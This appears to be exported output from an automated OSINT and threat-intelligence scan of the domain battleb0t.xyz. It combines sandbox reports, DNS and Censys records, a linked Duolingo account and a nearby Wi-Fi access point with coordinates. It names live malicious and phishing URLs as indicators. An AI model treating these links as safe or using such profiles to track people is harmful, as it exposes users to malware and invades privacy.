| 2023-05-12 02:55:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://kekw.battleb0t.xyz/jar', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:348:120:WilError_01"\n "SM0:348:120:WilError_01"\n "SM0:348:304:WilStaging_02"\n "Local\\SM0:348:304:WilStaging_02"\n "SM0:7052:120:WilError_01"\n "SM0:7052:304:WilStaging_02"\n "Local\\SM0:7052:120:WilError_01"\n "Local\\SM0:7052:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:120:WilError_01"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-220', u'name': u'Executes batch file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1059', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1059', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Process "msedge.exe" with commandline "--single-argument http://kekw.battleb0t.xyz/jar" (UID: 00000000-00007052)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"64.226.81.43:49750"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kekw.battleb0t.xyz"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007052]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00007052]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007052]\n "Session_13324411891984663" has type "data"- [targetUID: N/A]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\manifest.fingerprint]- [targetUID: 00000000-00007052]\n "c920e640-3cd4-4291-b5a7-5ed9af660f2d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp]- [targetUID: 00000000-00007052]\n "8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp]- [targetUID: 00000000-00007052]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007052]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007052]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\7052_1944693387\\manifest.json]- [targetUID: 00000000-00007052]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp]- [targetUID: 00000000-00007052]\n "Tabs_13324411893998198" has type "data"- [targetUID: N/A]\n "643a517a-ab51-4a47-a7fa-e8480b929b43.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\643a517a-ab51-4a47-a7fa-e8480b929b43.tmp]- [targetUID: 00000000-00007052]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokenAndKey\\LOG]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "http://kekw.battleb0t.xyz/jar"\n Pattern match: "Math.PI/180"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "http://kekw.battleb0t.xyz"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "kekw.battleb0t.xyz/jar"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\shoppingfre.js]- [targetUID: 00000000-00007052]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00007052]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007052]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7052_16790919\\adblock_snippet.js]- [targetUID: 00000000-00007052]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\auto_open_controller.js]- [targetUID: 00000000-00007052]\n "edge_confirmation_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping.js" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00007052]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\shopping_iframe_driver.js]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "3.0.0.8" found in string ""version": "3.0.0.8""\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45"\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\LICENSE"\n Potential IP "3.0.0.8" found in string "\xef\xbb\xbf{ "description": "AutofillCore data component", "name": "AutofillCore", "version": "3.0.0.8"}"\n Potential IP "5.1.0.0 | 64.226.81.43 |
| 2023-05-12 02:46:11 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [104.21.71.14] | 104.21.71.14 |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://kekw.battleb0t.xyz | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5c8cb9da901236-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:48:38 | Malicious Co-Hosted Site | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [www.github.com]
https://www.virustotal.com/en/domain/www.github.com/information/ | www.github.com |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Duolingo (Category: hobby)
https://www.duolingo.com/profile/ayhu | ayhu |
| 2023-05-12 02:57:23 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | www.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0.github.io |
| 2023-05-12 02:44:10 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | github.io | battleb0t.xyz |
| 2023-05-12 03:09:04 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.108 | 87.248.157.102 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Amethyst (Net ID: 00:01:21:30:76:B7) | 41.8781, -87.6298 |
| 2023-05-12 02:57:31 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://userclient-maindeskamz6.duckdns.org', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 13, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://start.seitenatelier.ch/free/desk17/usa', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7992:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7992:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7672:304:WilStaging_02"\n "Local\\SM0:7672:120:WilError_01"\n "Local\\SM0:7992:120:WilError_01"\n "Local\\SM0:7992:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8048:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.46.243:443"\n "142.250.189.14:443"\n "69.16.175.10:443"\n "142.251.46.212:443"\n "142.251.46.234:443"\n "142.250.191.67:443"\n "35.244.149.249:443"\n "142.251.32.33:443"\n "134.209.18.52:443"\n "104.17.24.14:443"\n "18.213.222.111:443"\n "34.148.97.127:443"\n "104.22.61.124:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "lihi2.cc"\n "releases.jquery.com"\n "userclient-maindeskamz6.duckdns.org"\n "www.cloudways.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows"), Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\7992_409393753\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007992]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7992_869135203\\Part-RU]- [targetUID: 00000000-00007992]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\7992_409393753\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007992]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007992]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007992]\n "f_00023e" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007992]\n "706fd1a1-8b40-4bc6-bcf9-91551dfb6c00.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 11805"- Location: [%TEMP%\\706fd1a1-8b40-4bc6-bcf9-91551dfb6c00.tmp]- [targetUID: 00000000-00007992]\n "f_00023d" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00007984]\n "1131927d-a60d-42de-bcc5-0f2ff1f19599.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "7f5c3e03-e3d9-4827-9689-97cf06d5cf28.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\7f5c3e03-e3d9-4827-9689-97cf06d5cf28.tmp]- [targetUID: 00000000-00007992]\n "dbd20caf-f43b-40a4-89ba-11e5c4cf28c9.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\dbd20caf-f43b-40a4-89ba-11e5c4cf28c9.tmp]- [targetUID: 00000000-00007992]\n "2295fc53-d7a2-464a-a8c5-f67c10386b59.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\2295fc53-d7a2-464a-a8c5-f67c10386b59.tmp]- [targetUID: 00000000-00007992]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005676]\n "13ecf884ff1581cb_0" has type "data"- [targetUID: N/A]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007992]\n "393a9751-d2fe-45b8-8e82-e58c32edcb4e.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\393a9751-d2fe-45b8-8e82-e58c32edcb4e.tmp]- [targetUID: 00000000-00007984]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007992]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\7992_869135203\\Filtering Rules]- [targetUID: 00000000-00007992]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00007992]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\LOG]- [targetUID: 00000000-00007992]\n "Indexing in Progress" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.38\\Indexing in Progress]- [targetUID: 00000000-00007992]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://start.seitenatelier.ch/free/desk17/usa"\n Pattern match: "https://start.seitenatelier.ch"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "lihi2.cc"\n Heuristic match: "releases.jquery.com"\n Heuristic match: "userclient-maindeskamz6.duckdns.org"\n Pattern match: "www.cloudways.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random\n "www.cloudways.com" seems to be random'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\7992_869135203\\adblock_snippet.js]- [targetUID: 00000000-00007992]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-43', u'name': u'Writes a PE file header to disc', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 6, u'description': u'"msedge.exe" wrote 8192 bytes starting with PE header signature to file "%TEMP%\\7992_409393753\\_platform_specific\\win_x64\\widevinecdm.dll": 4d5a78000100000004000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000000000000780000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e2400005045000064ff0a00 ...'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\7992_409393753\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007992]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7992_869135203\\Part-RU]- [targetUID: 00000000-00007992]'}, {u'category': u'Network Related', u'origin': u'File/Memory' | 34.148.97.127 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2082 | 172.67.168.252 |
| 2023-05-12 02:44:04 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | None None | battleb0t.xyz |
| 2023-05-12 02:54:00 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T02:04:48.515Z", "ip": "104.21.6.166", "location_updated_at": "2023-04-29T21:15:21.600075Z", "autonomous_system_updated_at": "2023-05-09T11:43:45.531739Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"www.proappsys.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-10T18:40:10.866976783Z"}, "cpcontacts.menuin.pe": {"record_type": "A", "resolved_at": "2023-03-24T20:44:33.512986421Z"}, "www.oldthdoo.xyz": {"record_type": "A", "resolved_at": "2022-09-26T19:11:07.076925735Z"}, "matrixeducatie.nl": {"record_type": "A", "resolved_at": "2023-05-03T04:09:23.480806956Z"}, "outimpivutinli.tk": {"record_type": "A", "resolved_at": "2023-05-03T21:57:31.066836981Z"}, "dhcp.pro": {"record_type": "A", "resolved_at": "2023-04-07T20:54:25.762591525Z"}, "kennedy.br": {"record_type": "A", "resolved_at": "2023-04-28T12:51:47.804820047Z"}, "sufferwith.info": {"record_type": "A", "resolved_at": "2023-05-10T17:23:47.734514798Z"}, "eraliser.tk": {"record_type": "A", "resolved_at": "2023-05-11T21:41:10.208194848Z"}, "www.jollygoodgames.com": {"record_type": "A", "resolved_at": "2023-05-07T14:57:18.867430647Z"}, "nzfortress.nz": {"record_type": "A", "resolved_at": "2022-12-07T17:06:16.407969123Z"}, "lorencic.net": {"record_type": "A", "resolved_at": "2023-04-27T21:11:28.873533314Z"}, "pesdatabase.altervista.org": {"record_type": "CNAME", "resolved_at": "2023-05-08T21:46:48.198722317Z"}, "cdn-4.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-02T19:46:18.705684829Z"}, "reanorthcong.tk": {"record_type": "A", "resolved_at": "2023-04-04T23:08:50.029341555Z"}, "4wdinfo.com": {"record_type": "A", "resolved_at": "2023-05-10T13:06:50.126601945Z"}, "cdn-2.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T00:33:24.840354602Z"}, "seribusenyum.org": {"record_type": "A", "resolved_at": "2023-02-18T18:24:43.138880401Z"}, "account-dev.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-11-23T16:34:50.737558857Z"}, "www.arquiteturasustentavel.arq.br.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2022-09-25T17:06:29.959927232Z"}, "amg166.com": {"record_type": "A", "resolved_at": "2023-05-11T13:53:26.798801874Z"}, "alexricher.com": {"record_type": "A", "resolved_at": "2023-05-09T13:21:30.399313330Z"}, "48ln.com": {"record_type": "A", "resolved_at": "2023-05-08T13:20:43.893083983Z"}, "efnebacthydeda.cf": {"record_type": "A", "resolved_at": "2023-04-21T12:58:48.779910168Z"}, "usbestsiding.com": {"record_type": "A", "resolved_at": "2023-05-02T23:18:02.110883898Z"}, "backup.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-12-01T13:53:19.633015199Z"}, "osdronovacsiewy.tk": {"record_type": "A", "resolved_at": "2023-05-07T21:56:01.549731533Z"}, "www.kendalresearchgroup.eu.org": {"record_type": "A", "resolved_at": "2023-05-05T19:50:13.137718896Z"}, "wildanmaulana.cf": {"record_type": "A", "resolved_at": "2023-05-04T13:01:54.678346749Z"}, "cpcalendars.itauna.mg.gov.br": {"record_type": "A", "resolved_at": "2023-04-28T12:51:58.455556942Z"}, "obhkitchens.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-12-01T10:58:42.826529023Z"}, "www.bouncefitness.precisiongroup.com.au": {"record_type": "A", "resolved_at": "2023-04-26T12:25:18.625366391Z"}, "www.onedollarglasses.org": {"record_type": "A", "resolved_at": "2023-05-07T21:18:07.768786749Z"}, "www.seribusenyum.org": {"record_type": "A", "resolved_at": "2023-02-04T17:32:21.980568714Z"}, "myschoolpoint.ca": {"record_type": "A", "resolved_at": "2023-05-06T12:57:35.437078256Z"}, "mitincderthesacom.tk": {"record_type": "A", "resolved_at": "2023-04-15T02:26:57.134312633Z"}, "kerzcoobamabasvio.cf": {"record_type": "A", "resolved_at": "2023-05-07T12:50:31.337450458Z"}, "apps.codiotic.com": {"record_type": "A", "resolved_at": "2023-05-06T14:35:31.397147978Z"}, "cdn.madeincanadadirectory.ca": {"record_type": "CNAME", "resolved_at": "2023-04-28T12:59:28.832256372Z"}, "www.usbestsiding.com": {"record_type": "A", "resolved_at": "2023-05-11T16:20:14.776067678Z"}, "prefahoutesraismac.ga": {"record_type": "A", "resolved_at": "2023-05-10T17:09:09.762399021Z"}, "datedei.ml": {"record_type": "A", "resolved_at": "2023-01-08T15:10:53.714814308Z"}, "tavernolaincanto.altervista.org": {"record_type": "CNAME", "resolved_at": "2023-04-10T21:37:30.505399325Z"}, "isnulemati.tk": {"record_type": "A", "resolved_at": "2023-05-01T20:43:57.727814020Z"}, "hlb.co.za": {"record_type": "A", "resolved_at": "2023-04-08T22:17:07.130263501Z"}, "api.sanopoly.com": {"record_type": "A", "resolved_at": "2023-04-26T16:20:22.956402279Z"}, "zacaluzoo.com.au": {"record_type": "A", "resolved_at": "2023-05-02T19:19:57.060547173Z"}, "www.typearound.com": {"record_type": "A", "resolved_at": "2023-05-03T15:59:44.822944002Z"}, "ketitarechesjunc.tk": {"record_type": "A", "resolved_at": "2023-05-05T20:23:13.362328225Z"}, "totnewsgativime.ml": {"record_type": "A", "resolved_at": "2023-05-11T18:38:46.532739958Z"}, "tgtetv.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-04-11T19:57:47.589434167Z"}, "credegtetandbeasump.tk": {"record_type": "A", "resolved_at": "2023-04-13T20:24:22.673256350Z"}, "tgtetv.prinsapps.com": 